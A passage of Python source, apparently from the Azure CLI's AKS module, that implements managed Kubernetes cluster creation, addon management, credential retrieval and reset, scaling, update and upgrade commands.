    if CONST_MONITORING_ADDON_NAME in addon_profiles:
        monitoring = True
        _ensure_container_insights_for_monitoring(
            cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])

    # addon is in the list and is enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled

    os_type = 'Linux'
    enable_virtual_node = False
    if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
        enable_virtual_node = True

    # --- AAD profile: managed AAD vs legacy client/server app flow. ---
    aad_profile = None
    if enable_aad:
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
            raise CLIError('"--enable-aad" cannot be used together with '
                           '"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
        if disable_rbac and enable_azure_rbac:
            raise ArgumentUsageError(
                '"--enable-azure-rbac" can not be used together with "--disable-rbac"')
        aad_profile = ManagedClusterAADProfile(
            managed=True,
            enable_azure_rbac=enable_azure_rbac,
            # ids -> i_ds due to track 2 naming issue
            admin_group_object_i_ds=_parse_comma_separated_list(
                aad_admin_group_object_ids),
            tenant_id=aad_tenant_id
        )
    else:
        if enable_azure_rbac is True:
            raise ArgumentUsageError(
                '"--enable-azure-rbac" can only be used together with "--enable-aad"')
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
            if aad_tenant_id is None:
                # Fall back to the tenant of the logged-in credentials.
                profile = Profile(cli_ctx=cmd.cli_ctx)
                _, _, aad_tenant_id = profile.get_login_credentials()

            aad_profile = ManagedClusterAADProfile(
                client_app_id=aad_client_app_id,
                server_app_id=aad_server_app_id,
                server_app_secret=aad_server_app_secret,
                tenant_id=aad_tenant_id
            )

    # --- API-server access (authorized IP ranges / private cluster). ---
    api_server_access_profile = None
    if enable_private_cluster and load_balancer_sku.lower() != "standard":
        raise CLIError("Please use standard load balancer for private cluster")
    if api_server_authorized_ip_ranges or enable_private_cluster:
        api_server_access_profile = _populate_api_server_access_profile(
            cmd,
            api_server_authorized_ip_ranges,
            enable_private_cluster=enable_private_cluster
        )

    # Check that both --disable-rbac and --enable-rbac weren't provided
    if all([disable_rbac, enable_rbac]):
        raise CLIError(
            'specify either "--disable-rbac" or "--enable-rbac", not both.')

    # --- Cluster identity: system-assigned vs user-assigned. ---
    identity = None
    if not enable_managed_identity and assign_identity:
        raise ArgumentUsageError(
            '--assign-identity can only be specified when --enable-managed-identity is specified')
    if enable_managed_identity and not assign_identity:
        identity = ManagedClusterIdentity(
            type="SystemAssigned"
        )
    elif enable_managed_identity and assign_identity:
        user_assigned_identity = {
            # pylint: disable=line-too-long
            assign_identity: Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties()
        }
        identity = ManagedClusterIdentity(
            type="UserAssigned",
            user_assigned_identities=user_assigned_identity
        )

    # --- Optional custom kubelet identity (requires user-assigned identity). ---
    identity_profile = None
    if assign_kubelet_identity:
        if not assign_identity:
            # pylint: disable=line-too-long
            raise ArgumentUsageError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
        kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
        identity_profile = {
            # pylint: disable=line-too-long
            'kubeletidentity': ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties(
                resource_id=assign_kubelet_identity,
                client_id=kubelet_identity.client_id,
                object_id=kubelet_identity.principal_id
            )
        }
        cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
        # ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
        _ensure_cluster_identity_permission_on_kubelet_identity(
            cmd.cli_ctx,
            cluster_identity_object_id,
            assign_kubelet_identity)

    # --- Assemble the ManagedCluster request payload. ---
    mc = ManagedCluster(
        location=location,
        tags=tags,
        dns_prefix=dns_name_prefix,
        kubernetes_version=kubernetes_version,
        enable_rbac=not disable_rbac,
        agent_pool_profiles=[agent_pool_profile],
        linux_profile=linux_profile,
        windows_profile=windows_profile,
        service_principal_profile=service_principal_profile,
        network_profile=network_profile,
        addon_profiles=addon_profiles,
        aad_profile=aad_profile,
        auto_scaler_profile=cluster_autoscaler_profile,
        api_server_access_profile=api_server_access_profile,
        identity=identity,
        disk_encryption_set_id=node_osdisk_diskencryptionset_id,
        identity_profile=identity_profile
    )

    use_custom_private_dns_zone = False
    if private_dns_zone:
        if not enable_private_cluster:
            raise InvalidArgumentValueError("Invalid private dns zone for public cluster. "
                                            "It should always be empty for public cluster")
        mc.api_server_access_profile.private_dns_zone = private_dns_zone
        from msrestazure.tools import is_valid_resource_id
        if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM:
            if is_valid_resource_id(private_dns_zone):
                use_custom_private_dns_zone = True
            else:
                raise InvalidArgumentValueError(
                    private_dns_zone + " is not a valid Azure resource ID.")

    if fqdn_subdomain:
        if not use_custom_private_dns_zone:
            raise ArgumentUsageError("--fqdn-subdomain should only be used for "
                                     "private cluster with custom private dns zone")
        mc.fqdn_subdomain = fqdn_subdomain

    if uptime_sla:
        # Paid tier on the Basic SKU name enables the uptime SLA.
        mc.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )

    if edge_zone:
        ExtendedLocation = cmd.get_models('ExtendedLocation',
                                          resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                          operation_group='managed_clusters')
        ExtendedLocationTypes = cmd.get_models('ExtendedLocationTypes',
                                               resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                               operation_group='managed_clusters')
        mc.extended_location = ExtendedLocation(
            name=edge_zone,
            type=ExtendedLocationTypes.EDGE_ZONE
        )

    # Add AAD session key to header.
    # If principal_obj is None, we will not add this header, this can happen
    # when the cluster enables managed identity. In this case, the header is useless
    # and that's OK to not add this header
    custom_headers = None
    if principal_obj:
        custom_headers = {
            'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}

    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            created_cluster = _put_managed_cluster_ensuring_permission(
                cmd,
                client,
                subscription_id,
                resource_group_name,
                name,
                mc,
                monitoring,
                ingress_appgw_addon_enabled,
                enable_virtual_node,
                need_post_creation_vnet_permission_granting,
                vnet_subnet_id,
                enable_managed_identity,
                attach_acr,
                custom_headers,
                no_wait)
            return created_cluster
        except CloudError as ex:
            retry_exception = ex
            if 'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    # All retries exhausted: surface the last AAD propagation error.
    raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
    """Disable the given addons on a managed cluster and push the change.

    Fetches the current cluster model, turns the requested addons off via
    ``_update_addons``, then submits the updated model back to the service.
    """
    subscription_id = get_subscription_id(cmd.cli_ctx)
    current = client.get(resource_group_name, name)
    updated = _update_addons(
        cmd,
        current,
        subscription_id,
        resource_group_name,
        name,
        addons,
        enable=False,
        no_wait=no_wait
    )

    # send the managed cluster representation to update the addon profiles
    return sdk_no_wait(no_wait, client.begin_create_or_update,
                       resource_group_name, name, updated)
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
                      workspace_resource_id=None,
                      subnet_name=None,
                      appgw_name=None,
                      appgw_subnet_cidr=None,
                      appgw_id=None,
                      appgw_subnet_id=None,
                      appgw_watch_namespace=None,
                      enable_sgxquotehelper=False,
                      no_wait=False):
    """Enable one or more addons on an existing managed cluster.

    Applies the addon changes via ``_update_addons`` and submits the updated
    cluster. When monitoring, appgw ingress or virtual node is being enabled,
    the call waits for the operation result so the follow-up role assignments
    can be performed against the updated cluster; otherwise it honours
    --no-wait.
    """
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
                              workspace_resource_id=workspace_resource_id,
                              subnet_name=subnet_name,
                              appgw_name=appgw_name,
                              appgw_subnet_cidr=appgw_subnet_cidr,
                              appgw_id=appgw_id,
                              appgw_subnet_id=appgw_subnet_id,
                              appgw_watch_namespace=appgw_watch_namespace,
                              enable_sgxquotehelper=enable_sgxquotehelper,
                              no_wait=no_wait)

    # Determine which addons ended up enabled; these need post-update work.
    enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
        and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
        and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled

    os_type = 'Linux'
    virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
    enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
                           instance.addon_profiles[virtual_node_addon_name].enabled)

    need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node

    if need_pull_for_result:
        if enable_monitoring:
            _ensure_container_insights_for_monitoring(
                cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])

        # adding a wait here since we rely on the result for role assignment
        result = LongRunningOperation(cmd.cli_ctx)(
            client.begin_create_or_update(resource_group_name, name, instance))

        if enable_monitoring:
            cloud_name = cmd.cli_ctx.cloud.name
            # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
            if cloud_name.lower() == 'azurecloud':
                from msrestazure.tools import resource_id
                cluster_resource_id = resource_id(
                    subscription=subscription_id,
                    resource_group=resource_group_name,
                    namespace='Microsoft.ContainerService', type='managedClusters',
                    name=name
                )
                _add_monitoring_role_assignment(
                    result, cluster_resource_id, cmd)

        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(result, cmd)

        if enable_virtual_node:
            # All agent pool will reside in the same vnet, we will grant vnet level Contributor role
            # in later function, so using a random agent pool here is OK
            random_agent_pool = result.agent_pool_profiles[0]
            if random_agent_pool.vnet_subnet_id != "":
                _add_virtual_node_role_assignment(
                    cmd, result, random_agent_pool.vnet_subnet_id)
            # Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
            # we don't need to handle it in client side in this case.

    else:
        result = sdk_no_wait(no_wait, client.begin_create_or_update,
                             resource_group_name, name, instance)
    return result
def aks_get_versions(cmd, client, location):
    """List Kubernetes orchestrator versions available in the given location."""
    # Only managed-cluster orchestrators are relevant for AKS.
    orchestrators = client.list_orchestrators(
        location, resource_type='managedClusters')
    return orchestrators
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
                        path=os.path.join(os.path.expanduser(
                            '~'), '.kube', 'config'),
                        overwrite_existing=False, context_name=None):
    """Fetch cluster credentials and merge (or print) the kubeconfig.

    Admin credentials are fetched when *admin* is set, user credentials
    otherwise. The KUBECONFIG environment variable is honoured only when the
    caller did not override the default path with -f/--file.
    """
    fetch = (client.list_cluster_admin_credentials if admin
             else client.list_cluster_user_credentials)
    credentialResults = fetch(resource_group_name, name)

    # Check if KUBECONFIG environmental variable is set
    # If path is different than default then that means -f/--file is passed
    # in which case we ignore the KUBECONFIG variable
    default_path = os.path.join(os.path.expanduser('~'), '.kube', 'config')
    if path == default_path and "KUBECONFIG" in os.environ:
        path = os.environ["KUBECONFIG"]

    if not credentialResults:
        raise CLIError("No Kubernetes credentials found.")
    try:
        kubeconfig = credentialResults.kubeconfigs[0].value.decode(
            encoding='UTF-8')
        _print_or_merge_credentials(
            path, kubeconfig, overwrite_existing, context_name)
    except (IndexError, ValueError):
        raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
    """List managed clusters, scoped to a resource group when one is given."""
    source = (client.list_by_resource_group(resource_group_name)
              if resource_group_name else client.list())
    return _remove_nulls(list(source))
def aks_show(cmd, client, resource_group_name, name):
    """Fetch a single managed cluster with null-valued fields stripped."""
    managed_cluster = client.get(resource_group_name, name)
    return _remove_nulls([managed_cluster])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
                           reset_service_principal=False,
                           reset_aad=False,
                           service_principal=None,
                           client_secret=None,
                           aad_server_app_id=None,
                           aad_server_app_secret=None,
                           aad_client_app_id=None,
                           aad_tenant_id=None,
                           no_wait=False):
    """Reset either the service principal or the legacy AAD profile of a cluster.

    Exactly one of --reset-service-principal / --reset-aad-profile must be
    chosen; the corresponding credential arguments are then required.
    """
    ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='managed_clusters')
    if bool(reset_service_principal) == bool(reset_aad):
        raise CLIError(
            'usage error: --reset-service-principal | --reset-aad-profile')

    if reset_service_principal:
        if service_principal is None or client_secret is None:
            raise CLIError(
                'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
        sp_profile = ManagedClusterServicePrincipalProfile(
            client_id=service_principal, secret=client_secret
        )
        return sdk_no_wait(no_wait,
                           client.begin_reset_service_principal_profile,
                           resource_group_name,
                           name, sp_profile)

    # --reset-aad path: the legacy client/server app trio is mandatory.
    if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
        raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
                       '--aad-server-app-secret SECRET [--aad-tenant-id ID]')
    parameters = {
        'clientAppID': aad_client_app_id,
        'serverAppID': aad_server_app_id,
        'serverAppSecret': aad_server_app_secret,
        'tenantID': aad_tenant_id
    }
    return sdk_no_wait(no_wait,
                       client.begin_reset_aad_profile,
                       resource_group_name,
                       name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
    """Scale the node count of a node pool; rejects autoscaler-enabled pools.

    When the cluster has a single pool the nodepool name may be omitted;
    otherwise it must be given explicitly.
    """
    instance = client.get(resource_group_name, name)
    pools = instance.agent_pool_profiles

    if len(pools) > 1 and nodepool_name == "":
        raise CLIError('There are more than one node pool in the cluster. '
                       'Please specify nodepool name or use az aks nodepool command to scale node pool')

    for pool in pools:
        is_match = (pool.name == nodepool_name or
                    (nodepool_name == "" and len(pools) == 1))
        if not is_match:
            continue
        if pool.enable_auto_scaling:
            raise CLIError(
                "Cannot scale cluster autoscaler enabled node pool.")
        pool.count = int(node_count)  # pylint: disable=no-member
        # null out the SP and AAD profile because otherwise validation complains
        instance.service_principal_profile = None
        instance.aad_profile = None
        return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
    raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
               enable_cluster_autoscaler=False,
               disable_cluster_autoscaler=False,
               update_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               min_count=None, max_count=None,
               uptime_sla=False,
               no_uptime_sla=False,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               attach_acr=None,
               detach_acr=None,
               api_server_authorized_ip_ranges=None,
               enable_aad=False,
               aad_tenant_id=None,
               aad_admin_group_object_ids=None,
               enable_ahub=False,
               disable_ahub=False,
               windows_admin_password=None,
               enable_managed_identity=False,
               assign_identity=None,
               yes=False,
               no_wait=False,
               enable_azure_rbac=False,
               disable_azure_rbac=False):
    """Update settings of an existing managed cluster (az aks update).

    Follows a GET -> mutate-in-memory -> PUT pattern: the cluster is fetched,
    each requested setting is applied to the local model, and the modified
    model is sent back in a single create-or-update call at the end.

    Returns the poller/result of the final PUT, or None when the operation is
    aborted (nothing to do on the autoscaler path, or the user declines a
    confirmation prompt).

    Raises CLIError (or MutuallyExclusiveArgumentError) for invalid or
    conflicting flag combinations.
    """
    # Resolve SDK model classes lazily against the active API version.
    ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
                                       resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                       operation_group='managed_clusters')
    ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
                                              resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                              operation_group='managed_clusters')
    ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
                                            resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                            operation_group='managed_clusters')
    Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties = cmd.get_models(
        'Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties',
        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
        operation_group='managed_clusters')
    # Booleans sum to the number of autoscaler operations requested; exactly
    # one is allowed (checked below as "!= 1" combined with the other flags).
    update_autoscaler = enable_cluster_autoscaler + \
        disable_cluster_autoscaler + update_cluster_autoscaler
    update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
                                                          load_balancer_outbound_ips,
                                                          load_balancer_outbound_ip_prefixes,
                                                          load_balancer_outbound_ports,
                                                          load_balancer_idle_timeout)
    update_aad_profile = not (
        aad_tenant_id is None and aad_admin_group_object_ids is None and
        not enable_azure_rbac and not disable_azure_rbac)
    # Fail fast when no recognized update flag was supplied at all.
    # pylint: disable=too-many-boolean-expressions
    if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
            not update_lb_profile and
            not attach_acr and
            not detach_acr and
            not uptime_sla and
            not no_uptime_sla and
            api_server_authorized_ip_ranges is None and
            not enable_aad and
            not update_aad_profile and
            not enable_ahub and
            not disable_ahub and
            not windows_admin_password and
            not enable_managed_identity and
            not assign_identity):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--cluster-autoscaler-profile" or '
                       '"--load-balancer-managed-outbound-ip-count" or'
                       '"--load-balancer-outbound-ips" or '
                       '"--load-balancer-outbound-ip-prefixes" or'
                       '"--load-balancer-outbound-ports" or'
                       '"--load-balancer-idle-timeout" or'
                       '"--attach-acr" or "--detach-acr" or'
                       '"--uptime-sla" or'
                       '"--no-uptime-sla" or '
                       '"--api-server-authorized-ip-ranges" or '
                       '"--enable-aad" or '
                       '"--aad-tenant-id" or '
                       '"--aad-admin-group-object-ids" or '
                       '"--enable-ahub" or '
                       '"--disable-ahub" or '
                       '"--windows-admin-password" or '
                       '"--enable-managed-identity" or '
                       '"--assign-identity" or '
                       '"--enable-azure-rbac" or '
                       '"--disable-azure-rbac"')
    if not enable_managed_identity and assign_identity:
        raise CLIError(
            '--assign-identity can only be specified when --enable-managed-identity is specified')
    instance = client.get(resource_group_name, name)
    # --- Cluster autoscaler: this command only touches the first pool. ---
    # For multi-agent pool, use the az aks nodepool command
    if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
                       'to update per node pool auto scaler settings')
    _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
                                       update_cluster_autoscaler)
    if enable_cluster_autoscaler:
        if instance.agent_pool_profiles[0].enable_auto_scaling:
            logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)
        instance.agent_pool_profiles[0].enable_auto_scaling = True
    if update_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)
    if disable_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            logger.warning(
                'Cluster autoscaler is already disabled for this node pool.')
            return None
        instance.agent_pool_profiles[0].enable_auto_scaling = False
        instance.agent_pool_profiles[0].min_count = None
        instance.agent_pool_profiles[0].max_count = None
    # if intention is to clear autoscaler profile
    if cluster_autoscaler_profile == {}:
        instance.auto_scaler_profile = {}
    # else profile is provided, update instance profile if it exists
    elif cluster_autoscaler_profile:
        # Merge user keys (dashes normalized to underscores) over the
        # existing profile's attribute dict.
        instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
                                                    dict((key.replace("-", "_"), value)
                                                         for (key, value) in cluster_autoscaler_profile.items())) \
            if instance.auto_scaler_profile else cluster_autoscaler_profile
    # --- ACR attach/detach: needs the kubelet identity (MSI clusters) or the
    # cluster service principal to grant/revoke AcrPull. ---
    subscription_id = get_subscription_id(cmd.cli_ctx)
    client_id = ""
    if _is_msi_cluster(instance):
        if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
            raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
                           'Please do not set --attach-acr or --detach-acr. '
                           'You can manually grant or revoke permission to the identity named '
                           '<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
        client_id = instance.identity_profile["kubeletidentity"].client_id
    else:
        client_id = instance.service_principal_profile.client_id
    if not client_id:
        raise CLIError('Cannot get the AKS cluster\'s service principal.')
    if attach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=attach_acr,
                        subscription_id=subscription_id)
    if detach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=detach_acr,
                        subscription_id=subscription_id,
                        detach=True)
    # --- Uptime SLA is modeled as the paid tier of the "Basic" SKU. ---
    if uptime_sla and no_uptime_sla:
        raise CLIError(
            'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
    if uptime_sla:
        instance.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )
    if no_uptime_sla:
        instance.sku = ManagedClusterSKU(
            name="Basic",
            tier="Free"
        )
    if update_lb_profile:
        instance.network_profile.load_balancer_profile = update_load_balancer_profile(
            cmd,
            load_balancer_managed_outbound_ip_count,
            load_balancer_outbound_ips,
            load_balancer_outbound_ip_prefixes,
            load_balancer_outbound_ports,
            load_balancer_idle_timeout,
            instance.network_profile.load_balancer_profile)
    # empty string is valid as it disables ip whitelisting
    if api_server_authorized_ip_ranges is not None:
        instance.api_server_access_profile = \
            _populate_api_server_access_profile(
                cmd,
                api_server_authorized_ip_ranges, instance=instance)
    # --- Managed AAD integration. ---
    if enable_aad:
        if instance.aad_profile is not None and instance.aad_profile.managed:
            raise CLIError(
                'Cannot specify "--enable-aad" if managed AAD is already enabled')
        instance.aad_profile = ManagedClusterAADProfile(
            managed=True
        )
    if update_aad_profile:
        if instance.aad_profile is None or not instance.aad_profile.managed:
            raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/"'
                           '"--enable-azure-rbac/--disable-azure-rbac"'
                           ' if managed AAD is not enabled')
        if aad_tenant_id is not None:
            instance.aad_profile.tenant_id = aad_tenant_id
        if aad_admin_group_object_ids is not None:
            # ids -> i_ds due to track 2 naming issue
            instance.aad_profile.admin_group_object_i_ds = _parse_comma_separated_list(
                aad_admin_group_object_ids)
        if enable_azure_rbac and disable_azure_rbac:
            raise MutuallyExclusiveArgumentError(
                'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
        if enable_azure_rbac:
            instance.aad_profile.enable_azure_rbac = True
        if disable_azure_rbac:
            instance.aad_profile.enable_azure_rbac = False
    # --- Windows: Azure Hybrid User Benefit license + admin password. ---
    if enable_ahub and disable_ahub:
        raise CLIError(
            'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
    if enable_ahub:
        instance.windows_profile.license_type = 'Windows_Server'
    if disable_ahub:
        instance.windows_profile.license_type = 'None'
    if windows_admin_password:
        instance.windows_profile.admin_password = windows_admin_password
    # --- Identity migration: SPN -> system/user-assigned managed identity.
    # Prompts for confirmation because kubelet keeps using the SPN until the
    # agent pool is upgraded (see message below). ---
    current_identity_type = "spn"
    if instance.identity is not None:
        current_identity_type = instance.identity.type.casefold()
    goal_identity_type = current_identity_type
    if enable_managed_identity:
        if not assign_identity:
            goal_identity_type = "systemassigned"
        else:
            goal_identity_type = "userassigned"
    if current_identity_type != goal_identity_type:
        msg = ""
        if current_identity_type == "spn":
            msg = ('Your cluster is using service principal, and you are going to update '
                   'the cluster to use {} managed identity.\n After updating, your '
                   'cluster\'s control plane and addon pods will switch to use managed '
                   'identity, but kubelet will KEEP USING SERVICE PRINCIPAL '
                   'until you upgrade your agentpool.\n '
                   'Are you sure you want to perform this operation?').format(goal_identity_type)
        else:
            msg = ('Your cluster is already using {} managed identity, and you are going to '
                   'update the cluster to use {} managed identity. \nAre you sure you want to '
                   'perform this operation?').format(current_identity_type, goal_identity_type)
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        if goal_identity_type == "systemassigned":
            instance.identity = ManagedClusterIdentity(
                type="SystemAssigned"
            )
        elif goal_identity_type == "userassigned":
            # pylint: disable=line-too-long
            user_assigned_identity = {
                assign_identity: Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties()
            }
            instance.identity = ManagedClusterIdentity(
                type="UserAssigned",
                user_assigned_identities=user_assigned_identity
            )
    # Addon flags are forwarded so the PUT helper can (re)grant the role
    # assignments those addons need.
    monitoring_addon_enabled = False
    ingress_appgw_addon_enabled = False
    virtual_node_addon_enabled = False
    if instance.addon_profiles is not None:
        monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
            instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
        ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
            instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
        virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
            instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME +
                                    'Linux'].enabled
    return _put_managed_cluster_ensuring_permission(
        cmd,
        client,
        subscription_id,
        resource_group_name,
        name,
        instance,
        monitoring_addon_enabled,
        ingress_appgw_addon_enabled,
        virtual_node_addon_enabled,
        False,
        instance.agent_pool_profiles[0].vnet_subnet_id,
        _is_msi_cluster(instance),
        attach_acr,
        None,
        no_wait)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
                client,
                resource_group_name, name,
                kubernetes_version='',
                control_plane_only=False,
                node_image_only=False,
                no_wait=False,
                yes=False):
    """Upgrade a managed cluster's Kubernetes version and/or node images.

    With --node-image-only, only node images are upgraded (every pool, one at
    a time, since the SDK upgrades a single node pool per call). Otherwise
    the control plane is upgraded to ``kubernetes_version``, and node pools
    are upgraded too unless --control-plane-only is given (legacy clusters
    always upgrade node pools together with the control plane).

    Returns None when the user declines any confirmation prompt; otherwise
    returns the cluster (node-image path) or the create-or-update poller.
    """
    msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None
    instance = client.get(resource_group_name, name)

    # Availability-set (non-VMSS) clusters are legacy and several operations
    # below are restricted for them.
    vmas_cluster = False
    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.type.lower() == "availabilityset":
            vmas_cluster = True
            break

    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')

    if node_image_only:
        # BUGFIX: the two string fragments previously concatenated to
        # "...clusterand might take..." — a space was missing.
        msg = "This node image upgrade operation will run across every node pool in the cluster " \
              "and might take a while, do you wish to continue?"
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        # Loop-invariant checks hoisted out of the per-pool loop: the VMAS
        # restriction and the agent-pool client do not depend on the pool.
        if vmas_cluster:
            raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                           'can only be applied on VirtualMachineScaleSets cluster.')
        # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
        agent_pool_client = cf_agent_pools(cmd.cli_ctx)
        for agent_pool_profile in instance.agent_pool_profiles:
            _upgrade_single_nodepool_image_version(True, agent_pool_client,
                                                   resource_group_name, name, agent_pool_profile.name)
        mc = client.get(resource_group_name, name)
        return _remove_nulls([mc])[0]

    if instance.kubernetes_version == kubernetes_version:
        if instance.provisioning_state == "Succeeded":
            logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
                           "will occur when upgrading to the same version if the cluster is not in a failed state.",
                           instance.kubernetes_version)
        elif instance.provisioning_state == "Failed":
            logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
                           "attempt resolution of failed cluster state.", instance.kubernetes_version)

    upgrade_all = False
    instance.kubernetes_version = kubernetes_version

    # for legacy clusters, we always upgrade node pools with CCP.
    if instance.max_agent_pools < 8 or vmas_cluster:
        if control_plane_only:
            msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
                   "upgraded to {} as well. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
        upgrade_all = True
    else:
        if not control_plane_only:
            msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
                   "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            upgrade_all = True
        else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pool will not change. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None

